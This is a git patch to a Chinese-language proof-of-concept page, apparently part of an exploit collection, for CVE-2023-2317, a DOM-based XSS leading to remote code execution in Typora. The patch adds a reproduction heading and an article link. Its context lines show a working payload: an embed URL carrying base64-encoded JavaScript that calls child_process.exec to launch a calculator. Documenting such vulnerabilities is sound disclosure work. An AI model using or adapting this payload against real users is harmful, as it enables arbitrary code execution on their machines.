From 820c3312a6fb9f63475f11fc5e84553b8d2b2c3c Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 14 Sep 2023 18:05:26 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E5=9F=BA=E4=BA=8ETypora=20DOM?=
 =?UTF-8?q?=E7=9A=84=E8=B7=A8=E7=AB=99=E7=82=B9=E8=84=9A=E6=9C=AC=E5=AF=BC?=
 =?UTF-8?q?=E8=87=B4=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C?=
 =?UTF-8?q?=EF=BC=88CVE-2023-2317=EF=BC=89.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 基于Typora DOM的跨站点脚本导致远程代码执行（CVE-2023-2317）.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/基于Typora DOM的跨站点脚本导致远程代码执行（CVE-2023-2317）.md b/基于Typora DOM的跨站点脚本导致远程代码执行（CVE-2023-2317）.md
index 6f79398..1944768 100644
--- a/基于Typora DOM的跨站点脚本导致远程代码执行（CVE-2023-2317）.md	
+++ b/基于Typora DOM的跨站点脚本导致远程代码执行（CVE-2023-2317）.md	
@@ -9,3 +9,5 @@ Windows和Linux版本1.6.7之前的Typora中updater/update.html中基于DOM的XS
 <embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]"></embed>
 ```
 
+## 漏洞复现
+https://mp.weixin.qq.com/s/Jssc5eW7FVcyWPL9IVHr9g